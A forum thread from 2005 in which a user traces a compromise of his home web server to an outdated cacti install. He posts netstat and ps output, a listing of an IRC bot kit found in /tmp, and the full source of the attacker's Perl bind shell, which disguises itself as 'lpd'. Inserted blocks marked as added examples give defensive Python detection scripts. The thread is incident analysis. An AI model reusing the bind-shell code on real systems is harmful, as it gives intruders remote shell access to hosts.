07-11-2005, 02:38 PM #1 Web Hosting Master
Join Date: Jun 2002 | Posts: 1,378
Apache "stealth" process? What is it?
Can someone tell me what just happened?
Background: I run a Linux desktop, but it's also facing the net (port 8080) as a webserver. (For services, it's providing ssh, http, samba, amphetadesk, and webmin. I'm NAT'ed, though, so only port 8080 is actually facing the public.)
All of a sudden I couldn't get anywhere online, so I started investigating. While looking at network stats, I happened to notice one of my CPUs was spiked at full usage.
top revealed a process known as "stealth" -- owned by user apache -- at 100% CPU usage.
Anyone know what this is? Or where it came from? Unless they were really good (somehow breaching the router, getting into the LAN, and attacking me from there), the only port anyone could see was 8080, running Apache, so, assuming this was some exploit, that's how they got in.
I'm going to poke through the logs to see if I can find anything. But has anyone seen this before that can offer some help?
-
07-11-2005, 02:42 PM #2 Web Hosting Master
Join Date: Jun 2002 | Posts: 1,378
Code:
# netstat --inet -W
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address                  State
tcp      510      0 localhost:http          localhost:52749                  CLOSE_WAIT
tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759   CLOSE_WAIT
tcp      191      0 dehimifier:webcache     lj2536.inktomisearch.com:47502   CLOSE_WAIT
tcp        0      1 dehimifier:32822        mblk-d28.mblk.aol.com:ircd       SYN_SENT
tcp        0      0 dehimifier:54685        oam-d10a.blue.aol.com:5190       TIME_WAIT
tcp       95      0 localhost:http          localhost:59978                  CLOSE_WAIT
tcp        0      0 dehimifier:57204        caim-d04b.blue.aol.com:5190      TIME_WAIT
tcp        0      0 dehimifier:45874        64.12.25.20:5190                 TIME_WAIT
The blue.aol.com is my AIM connection; I signed off right before running it, which apparently put them in CLOSE_WAIT. I'm not sure what's going on with the ircd port. I don't really use IRC.
I ran this the first time, note the IRC connection to another host:
Code:
# netstat --inet
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address             State
tcp      510      0 localhost:http          localhost:52749             CLOSE_WAIT
tcp      288      0 dehimifier:webcache     lj2517.inktomisea:57759     CLOSE_WAIT
tcp      191      0 dehimifier:webcache     lj2536.inktomisea:47502     CLOSE_WAIT
tcp        0      1 dehimifier:32821        sodium.mlink.net:ircd       SYN_SENT
tcp        0      0 dehimifier:54685        oam-d10a.blue.aol.:5190     ESTABLISHED
tcp       95      0 localhost:http          localhost:59978             CLOSE_WAIT
tcp        0      0 dehimifier:57204        caim-d04b.blue.aol:5190     ESTABLISHED
tcp        0      0 dehimifier:45874        64.12.25.20:5190            ESTABLISHED
tcp        0      0 localhost:52749         localhost:http              FIN_WAIT2
tcp        0      0 localhost:59978         localhost:http              FIN_WAIT2
-
07-11-2005, 02:47 PM #3 Web Hosting Master
Join Date: Jun 2002 | Posts: 1,378
Methinks someone's gotten in. I stopped Apache, but port 80 and 8080 (and 443) are still open. Playing with netstat options some more:
Code:
# netstat --inet -W -e -e
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address                  State        User     Inode
tcp      510      0 localhost:http          localhost:52749                  CLOSE_WAIT   root     0
tcp        0      0 localhost:40460         localhost:webcache               ESTABLISHED  n1zyy    2162851
tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759   CLOSE_WAIT   root     0
tcp      191      0 dehimifier:webcache     lj2536.inktomisearch.com:47502   CLOSE_WAIT   root     0
tcp      514      0 localhost:webcache      localhost:40460                  ESTABLISHED  root     0
tcp       95      0 localhost:http          localhost:59978                  CLOSE_WAIT   root     0
tcp        0      0 dehimifier:32823        oslo2.no.eu.undernet.org:ircd    ESTABLISHED  apache   2162790
How do I stop an Apache process that isn't running?
Edit: some more fun:
Code:
# ps aux | grep ^apache
apache   27637  0.0  0.0   1316  324 ?  Ss  Jul10  0:00 bin/bsh
apache   27697  0.0  0.1   1744  828 ?  Ss  Jul10  0:00 ./sendmail
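Added example, not posted by anyone in this thread: a small Python script that parses output shaped like the `netstat --inet -W -e -e` listing above and flags live connections that a web-service account holds towards an IRC port, which is exactly the line that gave the bot away here. The sample listing embedded in it is constructed (hostnames and inode numbers are made up); the service-account, port and state sets are assumptions to tune for your own hosts. Piping real `netstat` output in on stdin works the same way.

```python
import sys

# Constructed sample in the shape of `netstat --inet -W -e -e` (hosts and inodes made up).
SAMPLE_NETSTAT = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address                 State        User     Inode
tcp      510      0 localhost:http          localhost:52749                 CLOSE_WAIT   root     0
tcp        0      0 localhost:40460         localhost:webcache              ESTABLISHED  n1zyy    2162851
tcp        0      0 dehimifier:32823        irc.example.net:ircd            ESTABLISHED  apache   2162790
tcp        0      1 dehimifier:32822        irc2.example.net:6667           SYN_SENT     apache   0
tcp        0      0 dehimifier:54685        im.example.com:5190             TIME_WAIT    n1zyy    0
"""

SERVICE_USERS = {"apache", "www-data", "httpd", "nobody", "guest"}  # assumption: tune per host
IRC_PORTS = {"ircd", "6667", "6668", "6669", "6697", "7000"}         # common IRC service names/ports
ACTIVE_STATES = {"ESTABLISHED", "SYN_SENT"}                          # live, or being set up right now


def parse_netstat(text):
    """Return one dict per TCP row; header lines and UDP rows (no State column) are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 8 or not fields[0].startswith("tcp"):
            continue
        proto, recvq, sendq, local, foreign, state, user, inode = fields
        host, _, port = foreign.rpartition(":")  # -W keeps hostnames unabbreviated
        rows.append({"proto": proto, "local": local, "remote_host": host,
                     "remote_port": port, "state": state, "user": user, "inode": inode})
    return rows


def suspicious_connections(text):
    """(user, remote_host, remote_port, state) for live connections that a service
    account holds towards an IRC port. A web-server account has no business keeping
    a chat session open, and the owning user is what the second -e adds."""
    return [(r["user"], r["remote_host"], r["remote_port"], r["state"])
            for r in parse_netstat(text)
            if r["user"] in SERVICE_USERS
            and r["remote_port"] in IRC_PORTS
            and r["state"] in ACTIVE_STATES]


if __name__ == "__main__":
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    for hit in suspicious_connections(data):
        print("service account %s -> %s:%s (%s)" % hit)
```

For the follow-up question in the post (a listener that survives stopping the real daemon), adding `-p` to `netstat` prints the PID and program name behind each socket, which is the quicker route to the owning process than the user column alone.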
-
07-11-2005, 02:56 PM #4 Web Hosting Master
Join Date: Jun 2002 | Posts: 1,378
Looks like they were working out of /tmp.
Some interesting entries:
shell.pl
Code:
#!/usr/bin/perl
use Socket;
$port=4444;
$proto=getprotobyname('tcp');
$cmd="lpd";
$system='/bin/sh';
$0=$cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
    open(STDIN, ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");
    system($system);
    close(STDIN);
    close(STDOUT);
    close(STDERR);
}
Code:
# cd bin && ls -l
total 20
-rwxr-xr-x  1 apache apache 19426 May 19 15:41 bsh
Code:
# ls -l /tmp/cycomm/
total 1270
-rw-r--r--  1 apache apache   2156 Jul 10 09:31 Makefile
-rwxr-xr-x  1 apache apache  20358 Jan  1  2003 configure
drwxr-xr-x  4 apache apache    128 May 28  2004 contrib
-rw-r--r--  1 apache apache  22465 Jun 13  2001 cyc.help
-rw-r--r--  1 apache apache   1047 Jul 11 14:00 cyc.levels
-rw-------  1 apache apache      6 Jul 10 22:45 cyc.pid
-rw-r--r--  1 apache apache    768 Jul 11 14:00 cyc.session
-rwxr-xr-x  1 apache apache   2354 Jul 10 21:23 cyc.set
-rwxr-xr-x  1 apache apache 592978 Jul 10 18:30 cycmech
-rw-r--r--  1 apache apache     72 Jul 11 14:00 emech.users
-rwxr-xr-x  1 apache apache   4147 Jan 22  2002 genuser
-rwxr-xr-x  1 apache apache  14306 Jul  5 19:31 proc
drwxr-xr-x  2 apache apache    304 May 28  2004 randfiles
-rwxr-xr-x  1 apache apache 592978 Jul 10 18:30 sendmail
drwxr-xr-x  2 apache apache   1208 Jul 10 18:30 src
-rwxr-xr-x  1 apache apache  13399 Jul  5 07:38 stealth
-
07-11-2005, 03:17 PM #5 Web Hosting Master
Join Date: Jun 2002 | Posts: 1,378
Okay, my apologies for the barrage of posts. I was sort of freaking out. As it's a desktop box, I have the luxury of just being able to pull it off the network and take my time. (I'm now on a laptop.)
What I'm really interested in now is how they got in. I'd have expected it to be over ssh or something, but they really shouldn't have been able to. (Unless first getting into something else on the LAN here.)
That "stealth" program is clearly no good:
Code:
# ./stealth -h
twitch@Stealth: This tool is extremely dangerous. Use at your own risk!
Usage: st-kill <host> <port>
Can anyone offer me help in tracking exactly how they got in?
Last edited by fog; 07-11-2005 at 03:31 PM.
-
07-11-2005, 03:29 PM #6 Web Hosting Master
Join Date: Jun 2002 | Posts: 1,378
Heh, think I found it. (Might I mention I'm suddenly glad I went with mod_log_sql? It's wonderful when you have to go searching.)
Someone found me off of search.yahoo.com with a search phrase of "Please enter your cacti user name and password"
It looks like older versions (<=0.8.6d) of cacti are vulnerable to remote command execution. Guess who's running 0.8.5a?
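Added example, not from the thread: the log search described in this post, done in Python over Apache combined-format lines for anyone without mod_log_sql. It pulls the search phrase out of search-engine referrers, flags phrases that quote one of your own applications' login-page text (the cacti banner from the post) or any exact-phrase search, and then lists every request from the client that arrived that way, which is the pivot you want once you have a hit. The log lines are constructed for this example (addresses, paths and times are made up); the search-engine and banner lists are assumptions to extend for the sites you host.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (addresses, paths and times made up).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2005:18:02:11 -0400] "GET /cacti/index.php HTTP/1.1" 200 3120 "http://search.yahoo.com/search?p=%22Please+enter+your+cacti+user+name+and+password%22" "Mozilla/4.0"
10.0.0.5 - - [10/Jul/2005:18:02:40 -0400] "GET /cacti/graphs.php?action=view HTTP/1.1" 200 5110 "-" "Mozilla/4.0"
192.0.2.9 - - [10/Jul/2005:18:05:03 -0400] "GET /blog/ HTTP/1.1" 200 9210 "http://www.google.com/search?q=linux+desktop+webserver" "Mozilla/5.0"
"""

# One line of the "combined" LogFormat: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Search engines and the query parameter each one uses (assumption: extend as needed).
SEARCH_ENGINES = {"search.yahoo.com": "p", "www.google.com": "q", "www.bing.com": "q"}
# Login-page text of applications you host; the cacti banner is the one from the thread.
OWN_BANNERS = ["please enter your cacti user name and password"]


def parse_line(line):
    """Dict of the named fields above, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def search_query(referer):
    """The search phrase if referer is a known engine's result page, else None."""
    if referer in ("", "-"):
        return None
    parts = urlsplit(referer)
    param = SEARCH_ENGINES.get(parts.netloc.lower())
    if not param:
        return None
    return parse_qs(parts.query).get(param, [None])[0]  # parse_qs also undoes %22 and '+'


def looks_like_fingerprint(query):
    """A search for a page's exact text rather than for a topic."""
    q = query.lower()
    return any(banner in q for banner in OWN_BANNERS) or '"' in q


def fingerprint_hits(text):
    """(ip, path, query) for requests that arrived from a search for one of our pages' text."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        q = search_query(rec["referer"])
        if q is not None and looks_like_fingerprint(q):
            hits.append((rec["ip"], rec["path"], q))
    return hits


def requests_from(text, ip):
    """Every path one client requested, in log order: what to read next after a hit."""
    return [rec["path"] for rec in map(parse_line, text.splitlines())
            if rec and rec["ip"] == ip]


if __name__ == "__main__":
    for ip, path, q in fingerprint_hits(SAMPLE_LOG):
        print("%s reached %s via a search for %r" % (ip, path, q))
        for p in requests_from(SAMPLE_LOG, ip):
            print("   ", p)
```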
-
07-11-2005, 03:51 PM #7 Junior Guru
Join Date: Apr 2005 | Location: Sweden | Posts: 241
Geez, you needed a lot of help from here eh?
Kiddin', good work though. Next time you want to check out strings in a binary file there is the "strings" command (may or may not be installed) that can be easier than just looking through it with an editor.
Typically if you see a box with a lot of junk in /tmp and not-so-carefully hidden processes, you can be almost sure it's a vulnerability in a PHP or CGI script somewhere.
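Added example, not posted by anyone in the thread, that turns the advice above and the findings in post #4 into a check: the posted shell.pl sets `$0` to "lpd" so it looks like a print daemon in `ps`, and the bot lived under /tmp. The Python below walks /proc, compares what each process calls itself (argv[0]) with the real `/proc/<pid>/exe` target, flags binaries or working directories under world-writable scratch directories and binaries deleted after launch, and includes a minimal stand-in for `strings` for the case where the command is not installed. The records and byte blob it checks are constructed; `collect_live()` needs root to read other users' links, and symlinked interpreters (sh pointing at bash) will show up as name mismatches, so treat the tags as leads rather than verdicts.

```python
import os
import re
import sys

# Directories any local user can write to; a daemon running from here is a classic sign.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# Accounts that serve web content (assumption: extend for your distribution).
WEB_USERS = {"apache", "www-data", "httpd", "nobody", "guest"}
# Executable names a web-server account is expected to be running.
WEB_BINARIES = ("httpd", "apache", "php")


def in_scratch(path):
    """True if path is one of the scratch directories or lies beneath one."""
    clean = path.replace(" (deleted)", "")
    return any(clean == d or clean.startswith(d + "/") for d in SCRATCH_DIRS)


def audit_process(user, argv0, exe, cwd):
    """Return a list of tags for one process record; empty means nothing stood out.

    argv0 is the name from /proc/<pid>/cmdline (spoofable: shell.pl sets $0="lpd"),
    exe is the /proc/<pid>/exe link target, cwd the working directory."""
    tags = []
    if in_scratch(exe) or in_scratch(cwd):
        tags.append("scratch-dir")
    if exe.endswith(" (deleted)"):
        tags.append("deleted-binary")  # file unlinked after launch so it is not on disk
    shown = os.path.basename(argv0)
    real = os.path.basename(exe.replace(" (deleted)", ""))
    if shown and real and shown != real:
        tags.append("name-mismatch")  # symlinked interpreters also trigger this
    if user in WEB_USERS and not real.startswith(WEB_BINARIES):
        tags.append("web-account-foreign-binary")
    return tags


def collect_live():
    """Walk /proc and return (pid, user, argv0, exe, cwd) tuples (Linux only)."""
    import pwd
    records = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = "/proc/%s" % pid
        try:
            user = pwd.getpwuid(os.stat(base).st_uid).pw_name
            with open(base + "/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode("utf-8", "replace")
            exe = os.readlink(base + "/exe")
            cwd = os.readlink(base + "/cwd")
        except (OSError, KeyError):
            continue  # exited meanwhile, kernel thread, or no permission to read the links
        records.append((pid, user, argv0, exe, cwd))
    return records


def printable_strings(blob, min_len=4):
    """Minimal stand-in for strings(1): printable ASCII runs of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


# Constructed records shaped like the thread's findings (paths are illustrative).
SAMPLE_RECORDS = [
    ("apache", "/usr/sbin/httpd", "/usr/sbin/httpd", "/"),
    ("apache", "lpd", "/usr/bin/perl", "/tmp"),
    ("apache", "./sendmail", "/tmp/cycomm/sendmail", "/tmp/cycomm"),
    ("root", "stealth", "/tmp/cycomm/stealth (deleted)", "/root"),
]

# Constructed byte blob standing in for a stripped binary with a usage banner inside.
SAMPLE_BLOB = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
               + b"Usage: st-kill <host> <port>\x00\x01\x02"
               + b"GCC: (GNU) 3.4\x00")


if __name__ == "__main__":
    # Pass --live to audit the running system instead of the constructed records.
    records = [r[1:] for r in collect_live()] if "--live" in sys.argv else SAMPLE_RECORDS
    for rec in records:
        tags = audit_process(*rec)
        if tags:
            print("%s %s -> %s: %s" % (rec[0], rec[1], rec[2], ", ".join(tags)))
    print(printable_strings(SAMPLE_BLOB))
```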
-
05-04-2011, 11:09 AM #8 New Member
Join Date: May 2011 | Posts: 1
This is May 4, 2011 and I have the same problem. I found your thread today with the same process running owning nearly 100% CPU. The only difference is that the owner of that process is guest instead of apache. I have Fedora 14, and all packages are up-to-date.